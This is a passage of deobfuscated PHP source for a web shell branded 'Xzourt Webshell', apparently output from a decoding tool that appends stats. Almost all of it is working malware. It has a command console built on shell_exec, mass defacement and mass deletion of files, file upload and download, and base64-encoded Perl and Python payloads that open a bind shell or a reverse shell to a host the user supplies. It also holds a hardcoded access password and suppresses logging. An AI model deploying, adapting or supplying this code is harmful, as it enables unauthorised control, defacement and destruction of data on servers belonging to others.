$_7["d_file"], $_7["script"]); } elseif ($_7["tipe"] == "onedir") { mass_onedir($_7["d_dir"], $_7["d_file"], $_7["script"]); } } s(); echo "
\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9 <form method='POST'> Tipe:\xa\x9 \x9<div class='form-check'>\xa\x9\x9\x9\x9<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>\xa \x9 <label class='form-check-label' for='flexCheckDefault'>One dir</label>\xa \x9\x9</div>
\x9 <div class='form-check'>\xa \x9\x9 <input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'>
<label class='form-check-label' for='flexCheckDefault'>All directory</label>
\x9 \x9</div>\xa \x9 <i class='bi bi-folder'></i> Directory:\xa <input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\xa \x9\x9\x9<i class='bi bi-file-earmark'></i> Filename:
\x9 \x9<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename'>\xa\x9\x9\x9 <i class='bi bi-file-earmark'></i> Your script:\xa \x9<textarea class='form-control btn-sm' rows='7' name='script' placeholder='your script'></textarea>
\x9 \x9<div class='d-grid gap-2'>\xa \x9 <input class='btn btn-dark btn-sm' type='submit' name='start' value='deface'>
\x9\x9 </div>
\x9 </form>\xa\x9 </div>"; } if ($_7["id"] == "delete") { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { if (file_exists("{$dir}/{$namefile}")) { unlink("{$dir}/{$namefile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namefile}")) { unlink('' . dirname($dir) . "/{$namefile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$}<br>"; unlink($); $ = mass_delete($dirc, $namefile); } } } } } } } if ($_7["start"]) { mass_delete($_7["d_dir"], $_7["d_file"]); } s(); echo "
\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9 \x9<form method='POST'>\xa \x9\x9\x9<i class='bi bi-folder'></i> Directory:
\x9\x9\x9\x9<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}' {$_r}>\xa \x9 <i class='bi bi-file-earmark'></i> Filename:
\x9 \x9 <div class='input-group'>
\x9 <input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' {$_r}><br>
\x9<div class='input-group-append'>
\x9 <input class='btn btn-dark btn-sm' type='submit' name='start' value='delete'>
\x9\x9\x9\x9 </div>
\x9\x9\x9\x9</div>\xa\x9 \x9</form>\xa\x9 </div>"; } if ($_7["id"] == "phpinfo") { @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $front = strpos($buff, "<body>") + 6; $end = strpos($buff, "</body>"); echo "<pre class='php_info'>" . substr($buff, $front, $front - $front) . "</pre>"; die; } if ($_7["id"] == "network") { s(); echo "
\x9 <div class='card text-dark'>
\x9\x9<div class='card-header'>
<form method='post'>
\x9\x9 \x9 <u>Bind port to /bin/sh [Perl]</u><br>
\x9\x9\x9<u>Port :</u>
\x9 \x9 <div class='input-group'>
\x9 <input class='form-control btn-sm' type='text' name='port' placeholder='6969'>
\x9 \x9 \x9<input class='btn btn-dark btn-sm' type='submit' name='bpl' value='submit'>\xa\x9 </div>
\x9\x9<h5>Back-Connect</h5>\xa \x9\x9<u>Server :</u>
\x9\x9<input class='form-control btn-sm' type='text' name='server' placeholder='" . $_SERVER["REMOTE_ADDR"] . "'>\xa\x9 \x9<u>Port :</u>\xa\x9\x9\x9<div class='input-group'>
\x9\x9 <input class='form-control btn-sm' type='text' name='port' placeholder='6969'>
\x9 \x9<select class='form-control btn-sm' name='bc'>\xa\x9\x9\x9 <option value='perl'>perl</option>
\x9\x9\x9\x9 <option value='python'>python</option>
\x9\x9 \x9</select>
\x9\x9</div>\xa\x9 <div class='d-grid gap-2'>
\x9\x9\x9\x9<input class='btn btn-dark btn-sm btn-block' type='submit' value='submit'>\xa\x9 </div>\xa\x9\x9</form>"; if ($_7["bpl"]) { $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen("bp.pl", "w"); fwrite($brt, $bp); $out = exe("perl bp.pl " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}\xa" . exe("ps aux | grep bp.pl") . "</pre>"; unlink("bp.pl"); } if ($_7["bc"] == "perl") { $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen("bc.pl", "w"); fwrite($plbc, $bc); $out = exe("perl bc.pl " . $_7["server"] . " " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}
" . exe("ps aux | grep bc.pl") . "</pre>"; unlink("bc.pl"); } if ($_7["bc"] == "python") { $bc_py = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen("bcpy.py", "w"); fwrite($pbc_py, $bc_py); $out_py = exe("python bcpy.py " . $_7["server"] . " " . $_7["port"]); sleep(1); echo "<pre>{$out_py}\xa" . exe("ps aux | grep bcpy.py") . "</pre>"; unlink("bcpy.py"); } echo "</div>\xa\x9 </div>\xa \x9<br/>"; } if ($_7["id"] == "cmd") { s(); if (!empty($_POST["cmd"])) { $cmd = shell_exec($_POST["cmd"] . " 2>&1"); } echo "\xa\x9 <div class='mb-3'>\xa\x9\x9 <form method='POST'>
\x9 <div class='input-group mb-3'>\xa \x9 <input class='form-control btn-sm' type='text' name='cmd' value='" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "' placeholder='whoami' {$_r}>\xa <button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>\xa\x9 \x9</div>
\x9 </form>"; if ($cmd) { echo "\xa\x9\x9\x9<div class="container-fluid language-javascript">
<div class="shell mb-3">
\x9\x9 \x9 <pre style="font-size:10px;"><gr>~</gr>$ <rd>" . htmlspecialchars($_POST["cmd"]) . "</rd><br><code>" . htmlspecialchars($cmd, ENT_QUOTES, "UTF-8") . "</code></pre>\xa\x9 \x9 </div>
\x9 </div>"; } elseif (!$cmd && $_SERVER["REQUEST_METHOD"] == "POST") { echo "\xa\x9\x9\x9<div class="container-fluid language-javascript">\xa \x9\x9\x9<div class="shell mb-3">\xa \x9 \x9<pre style="font-size:10px;"><code>No result</code></pre>
\x9 \x9\x9</div>\xa\x9\x9\x9</div>
\x9 </div>"; } } if ($_7["id"] == "upload") { s(); if (isset($_7["upl"])) { $result = count($_FILES["file"]["name"]); for ($contents = 0; $contents < $result; $contents++) { $namefile = $_FILES["file"]["name"][$contents]; $up = @copy($_FILES["file"]["tmp_name"][$contents], "{$path}/" . $namefile); } if ($result < 2) { if ($up) { echo "<strong>Upload</strong> {$namefile} ok! " . ok() . "</div>"; } else { echo "<strong>Upload</strong> fail! " . er() . "</div>"; } } else { echo "<strong>Upload</strong> {$result} ok! " . ok() . "</div>"; } } echo "\xa\x9 <div class='card card-body text-dark input-group mb-3'>\xa <u>Multiple upload</u>\xa\x9 \x9<form method='POST' enctype='multipart/form-data'>\xa\x9\x9\x9 <div class='input-group'>
\x9 \x9\x9 <input class='form-control form-control-sm' type='file' name='file[]' multiple='' {$_r}>
\x9\x9 \x9<input class='btn btn-dark btn-sm' type='submit' name='upl' value='upload'>\xa\x9 \x9\x9</div>
\x9 </form>
\x9</div>"; } } goto o8bBX; n4wge: foreach ($scand as $file) { $ft = date("Y-m-d G:i", filemtime("{$path}/{$file}")); if (function_exists("posix_getpwuid")) { $fowner = @posix_getpwuid(fileowner("{$path}/{$file}")); $fowner = $fowner["name"]; } else { $fowner = fileowner("{$path}/{$file}"); } if (function_exists("posix_getgrgid")) { $fgrp = @posix_getgrgid(filegroup("{$path}/{$file}")); $fgrp = $fgrp["name"]; } else { $fgrp = filegroup("{$path}/{$file}"); } if (!is_file($path . "/" . $file)) { continue; } if (strlen($file) > 25) { $_f = substr($file, 0, 25) . "...-." . $ext; } else { $_f = $file; } echo "\xa \x9<tr>
\x9<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' href='?dir={$path}&action=view&opn={$file}'>{$_f}</a></td>
\x9\x9\x9<td class='text-center'>file</td>
\x9\x9\x9<td class='text-center'>{$ft}</td>\xa <td class='text-center'>" . sz(filesize($file)) . "</td>\xa\x9\x9 <td class='text-center'>{$fowner}<gr>/</gr>{$fgrp}</td>
\x9\x9 <td class='text-center'>"; if (is_writable($path . "/" . $file)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $file)) { echo "<rd>"; } echo p($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</gr></rd></td>"; } echo "
\x9 <td class='text-center'>
\x9 <div class='btn-group'>\xa \x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>
\x9\x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>
\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>\xa\x9 \x9</div>
\x9</td>
</tr>"; } goto Aif8H; qLV0I: date_default_timezone_set("Asia/Jakarta"); goto binbg; skUzm: echo " [ " . w($path, p($path)) . " ]"; goto octvi; jK5Gg: echo "\xa\x9\x9<div class="table-responsive">\xa\x9 <table class="table table-hover table-dark text-light">
<thead>
\x9\x9<tr>
\x9\x9<td class="text-center">name</td>
\x9\x9\x9 <td class="text-center">type</td>
<td class="text-center">last edit</td>\xa\x9\x9\x9 <td class="text-center">size</td>
\x9 <td class="text-center">owner<gr>/</gr>group</td>\xa\x9 \x9<td class="text-center">permsion</td>
\x9<td class="text-center">action</td>\xa \x9</tr>\xa\x9 </thead>\xa\x9 <tbody class="text-nowrap">
\x9 <tr>\xa\x9 <td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=" . dirname($dir) . "">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">\xa <div class="btn-group">
\x9 <a class="btn btn-outline-light btn-sm" href="?filenew&path=" . $dir . ""><i class="bi bi-file-earmark-plus-fill"></i></a>\xa \x9 <a class="btn btn-outline-light btn-sm" href="?dirnew&path=" . $dir . ""><i class="bi bi-folder-plus"></i></a>
\x9 </div>\xa\x9 </td>
\x9 </tr>"; goto d3JjR; H2vUy: $xtx = $data; goto PjodP; avrpj: ini_set("memory_limit", "64M"); goto e0M_f; GM5Lw: $pesan_alert = "[ {$x_path} ]"; goto cmezN; taJBV: $wget = exe("wget --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto i4QHr; GdxU5: function w($dir, $perm) { if (!is_writable($dir)) { return "<rd>" . $perm . "</rd>"; } else { return "<gr>" . $perm . "</gr>"; } } goto d03Rs; mVBqX: @ini_set("max_execution_time", 0); goto gczsm; RkY6o: function p($file) { $p = fileperms($file); if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto x5wmL; wpPmE: if ($_7["action"] == "rename") { s(); echo "
\x9 <div class='btn-group'>
\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>
\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>\xa \x9</div>
<br>
\x9 <i class='bi bi-file-earmark'></i>: " . basename($file) . "\xa\x9\x9</br>\xa\x9\x9<form method='POST'>
<div class='input-group'>\xa \x9\x9<input class='form-control btn-sm' type='text' name='new_name' value='" . basename($file) . "' {$_r}>
\x9\x9 <button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button>
\x9\x9</div>\xa\x9\x9</form>"; } goto UQq_F; vbV3q: $_r = "required='required'"; goto BZcMI; f20ej: @ini_set("display_errors", 0); goto Lw2_l; McQhW: $py = exe("python --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto JpEYZ; OcHn3: $telegram = "on"; goto a2ryI; gUvZY: if (empty($disfunc)) { $disfc = "<gr>NONE</gr>"; } else { $disfc = "<rd>{$disfunc}</rd>"; } goto viHFv; viHFv: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto XqpqE; qKf4D: echo "
<div class='container-fluid'>\xa \x9<div class='corner anu'>
\x9<b data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'><i class='bi bi-info-circle'></i> info server <i class='bi bi-chevron-down'></i></b>\xa\x9\x9\x9</div>
\x9\x9<div class='collapse text-dark mb-3' id='collapseExample'>\xa \x9\x9 <div class='box shadow bg-light p-3 rounded-3'>\xa \x9 \x9System: <gr>" . php_uname() . "</gr><br>\xa \x9 Software: <gr>" . $_SERVER["SERVER_SOFTWARE"] . "</gr><br>
\x9\x9\x9 PHP version: <gr>" . PHP_VERSION . "</gr> <a class='text-decoration-none' href='?dir={$path}&id=phpinfo'>[ PHPINFO ]</a> PHP os: <gr>" . PHP_OS . "</gr><br>
\x9\x9\x9\x9Server Ip: <gr>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</gr><br>\xa\x9\x9 \x9Your Ip: <gr>" . ia() . "</gr><br>\xa \x9User: <gr>{$user}</gr> ({$uid}) | Group: <gr>{$group}</gr> ({$gid})<br>
\x9\x9 Safe Mode: {$sm}<br>\xa\x9\x9\x9 MySQL: {$sql} | Perl: {$pl} | Python: {$py} | WGET: {$wget} | CURL: {$curl}<br>\xa\x9\x9\x9 Disable Function:<br><pre>{$disfc}</pre>\xa\x9 \x9</div>
\x9 </div>
\x9 </div>
\x9 <div class='text-center'>
\x9 <div class='btn-group'>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass deface</a>
\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\xa\x9\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Console</a>\xa </div>
\x9 <div class='btn-group'>
\x9 \x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=scan_root'><i class='bi bi-search'></i> Scan root</a>\xa \x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=network'><i class='bi bi-hdd-network'></i> Network</a>
\x9\x9 <a class='btn btn-outline-light btn-sm' href='?left'><i class='bi bi-box-arrow-in-left'></i> Logout</a>\xa </div>\xa \x9</div>"; goto KnAgU; x5wmL: if (isset($_7["dir"])) { $dir = $_7["dir"]; chdir($dir); } else { $dir = $gcw(); } goto xc3qc; UQq_F: if ($_7["action"] == "delete_file") { s(); if ($_7["yeahx"]) { $delete = unlink($file); if ($delete) { echo "<strong>Delete file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Delete file</strong> fail! " . er() . "</div>"; } } echo "
\x9\x9<div class='btn-group mb-3'>\xa \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa \x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa \x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>\xa\x9\x9</div>
\x9 <div class='card card-body text-dark input-group mb-3'>\xa\x9 <p>Are you sure to delete : " . basename($file) . " ?</p>
\x9 \x9<form method='POST'>
\x9 \x9 <a class='btn btn-danger btn-block btn-sm' href='?dir={$dir}'>No</a>\xa \x9<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>\xa\x9 \x9</form>
\x9\x9</div>"; } goto LBZGy; XzF7p: if (isset($_7["left"])) { session_start(); session_destroy(); echo "<script>window.location="" . $_SERVER["PHP_SELF"] . "";</script>"; } goto HYFWh; idnUM: $inipass = "eGNoYW4xMjNA"; goto dVZti; XqpqE: $sm = @ini_get(strtolower("safe_mode")) == "on" ? "<rd>ON</rd>" : "<gr>OFF</gr>"; goto qKf4D; xIYwS: session_start(); goto VVBQf; e8qd0: $to = "[email protected]"; goto RkUOz; GGQ1Y: @ini_set("error_log", null); goto Ao2uT; wULVu: $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto fEjCS; HYFWh: if (isset($_7["opn"]) && $_7["opn"] != '' && $_7["action"] == "download") { @ob_clean(); $file = $_7["opn"]; header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto GdxU5; e0M_f: header("Content-Type: text/html; charset=UTF-8"); goto e8qd0; RkUOz: $x_path = "http://" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto GM5Lw; ajmYY: function ia() { $ia = ''; if (getenv("HTTP_CLIENT_IP")) { $ia = getenv("HTTP_CLIENT_IP"); } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $ia = getenv("HTTP_X_FORWARDED_FOR"); } else { if (getenv("HTTP_X_FORWARDED")) { $ia = getenv("HTTP_X_FORWARDED"); } else { if (getenv("HTTP_FORWARDED_FOR")) { $ia = getenv("HTTP_FORWARDED_FOR"); } else { if (getenv("HTTP_FORWARDED")) { $ia = getenv("HTTP_FORWARDED"); } else { if (getenv("REMOTE_ADDR")) { $ia = getenv("REMOTE_ADDR"); } else { $ia = "Unknown IP."; } } } } } } return $ia; } goto uJh3k; wciV1: if ($_7["action"] == "view") { s(); echo "
<div class='btn-group'>\xa\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye-fill'></i></a>\xa \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>
\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=download&opn={$file}'><i class='bi bi-download'></i></a>\xa\x9 </div>
<br>\xa \x9<i class='bi bi-file-earmark'></i>: " . basename($file) . "
\x9\x9</br>
\x9\x9<div class='bg-dark'>\xa\x9 <div class='container-fluid language-javascript'>
\x9 \x9 <textarea rows='10' class='form-control' disabled=''>" . htmlspecialchars(file_get_contents($file)) . "</textarea>\xa \x9</div>
</div>"; } goto KHzp9; PUide: function er() { echo "<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto UPxMA; LBZGy: if ($_7["action"] == "delete_folder") { s(); if ($_7["yeah"]) { if (is_dir($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("rm -rf {$dir}"); @exe("rmdir /s /q {$dir}"); echo "<strong>Delete folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Delete folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } } echo "
<div class='btn-group mb-3'>
\x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa </div>\xa\x9 <div class='card card-body text-dark input-group mb-3'>
\x9<p>Are you sure to delete : " . basename($dir) . " ?</p>
\x9 \x9<form method='POST'>
\x9\x9\x9<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a>\xa \x9\x9 <input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>\xa </form>\xa\x9\x9</div>"; } goto sYXiW; KnAgU: if (isset($_7["dir"])) { $dir = $_7["dir"]; chdir($dir); } else { $dir = $gcw(); } goto l_7Kw; d3JjR: foreach ($scand as $dir) { $dt = date("Y-m-d G:i", filemtime("{$path}/{$dir}")); if (strlen($dir) > 25) { $_d = substr($dir, 0, 25) . "..."; } else { $_d = $dir; } if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner("{$path}/{$dir}")); $downer = $downer["name"]; } else { $downer = fileowner("{$path}/{$dir}"); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}")); $dgrp = $dgrp["name"]; } else { $dgrp = filegroup("{$path}/{$dir}"); } if (!is_dir($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "\xa\x9 <tr>
\x9 \x9<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href='?dir={$path}/{$dir}'>{$_d}</a></td>\xa\x9\x9\x9<td class='text-center'>dir</td>\xa\x9 \x9<td class='text-center'>{$dt}</td>
\x9<td class='text-center'>-</td>\xa\x9 <td class='text-center'>{$downer}<gr>/</gr>{$dgrp}</td>\xa \x9 <td class='text-center'>"; if (is_writable($path . "/" . $dir)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $dir)) { echo "<rd>"; } echo p($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font></center></td>"; } echo "\xa \x9\x9<td class='text-center'>\xa \x9\x9<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}/{$dir}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a><a class='btn btn-outline-light btn-sm' href='?dir={$path}/{$dir}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
\x9\x9</div>\xa \x9</td>\xa </tr>"; } goto n4wge; octvi: $sql = function_exists("mysql_connect") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto LAdCu; U8rFL: ?>
<div class="text-secondary"> Xzourt Webshell Company</div>Function Calls
| None |
Stats
| MD5 | f8882811d891368e620c18aeaa1163e9 |
| Eval Count | 0 |
| Decode Time | 69 ms |